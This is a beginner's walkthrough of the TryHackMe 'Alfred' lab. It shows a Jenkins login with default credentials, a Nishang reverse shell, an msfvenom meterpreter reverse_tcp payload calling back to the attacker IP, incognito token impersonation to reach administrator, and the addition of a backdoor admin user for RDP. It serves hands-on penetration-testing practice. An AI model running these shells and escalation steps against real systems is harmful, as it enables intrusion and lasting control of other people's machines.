Alfred TryHackMe Walkthrough

ALFRED – TRYHACKME – WALKTHROUGH

Attacker IP: 10.6.10.8
Victim IP: 10.10.25.210

Open Ports:
(80) – HTTP Webserver
(8080) – HTTP Webserver
(3389) – RDP – Remote Desktop

Server: Microsoft IIS httpd 7.5

Introduction

I’ve decided that to practice my pentest skills it would be helpful if I created some walkthroughs to help me practice. This is my first walkthrough and hope to make many more. Jenkins is a self-contained, open source automation server which can be used to automate all sorts of tasks related to building, testing, and delivering or deploying software. Our mission is to exploit Jenkins to gain an initial shell, then escalate our privileges by exploiting Windows authentication tokens. There are 2 flags on this box, user and root.

Source Link: Try Hack Me Room Alfred

Scanning & Enumeration

We will start by scanning the box using nmap. We know that the box doesn’t respond to ping requests so we must use a -Pn flag. The scan returns 3 open open ports: 80, 8080, 3389. Looking at the page source on port 80 there is no new information and robots.txt doesn’t exist, we move on to port 8080 and notice that there is a login page. We did a quick google search to see that there are default credentials for Jenkins. admin:password didn’t work but admin:admin worked. We are now able to login to Jenkins.

nmap -sV -A -Pn 10.10.25.210

Enumeration

We know the version information for port 8080 is Jetty 9.4.z, searchsploit did not reveal any exploits. Jenkins is running version 2.190.1 but didn’t return any exploits either. Let’s look at creating a project as we can see that we have the option to Execute Windows batch commands. Tryhackme suggests using Nishang to get the initial shell.

Exploitation

Task 1 – Initial Access

First we will need the Nishang PowerShell reverse scripts. You can download them from Nishang PowerShells, we will be using the Invoke-PowershellTcp.ps1 reverse script. The idea here is that we will start an HTTP server so that the batch script can download from our attacker machine to the victim machine. 9001 is the netcat listener, where we can get our shell.

Steps:

1. Download the Script
2. Host the Script
3. Start NC listener port 9001
4. Build in Jenkins
5. Get User Flag

python3 -m http.server

nc -lvnp 9001

Task 2 – Upgrade Shell

Create payload with msfvenom and upgrade to meterpreter shell. Steps to follow:

1. Create msfvenom paylod
2. Setup multi/handler
3. Download reverse shell to target
4. Start Process

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –encoder x86/shikata_ga_nai LHOST=10.6.10.8 LPORT=9002 -f exe -o reverse.exe

Setup multi/handler

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.6.10.8
set LPORT 9002
run

Download revshell to target:

Start process with:

Start-Process “reverse.exe”

Priviledge Escalation (Privesc) – Task 3

We check the privileges user alfred has enabled and will exploit the SeImpersonatePrivilege with the help of incognito.

Steps:

1. Load icognito
2. List tokens
3. Impersonate Admin
4. Migrate Service
5. Get Root Flag

Exit shell back to meterpreter

load incognito

list_tokens -g

impersonate_token “BUILTIN\Administrators”

getuid

ps

migrate 668

Post Exploitation

Create a User and RDP into box. Steps:

1. Create New User
2. Add New User to Administrators group
3. Log Into RDP with new credentials

Parting Thoughts

I had a great time working on the Alfred box. I figured that the more I practiced the better I’d become so I decided that writing these walkthroughs will help me practice the concepts. Feel free to comment with any questions or problems you may be running into. Happy Hacking!

Supplemental Resources – Videos

Supplemental Resources – WriteUps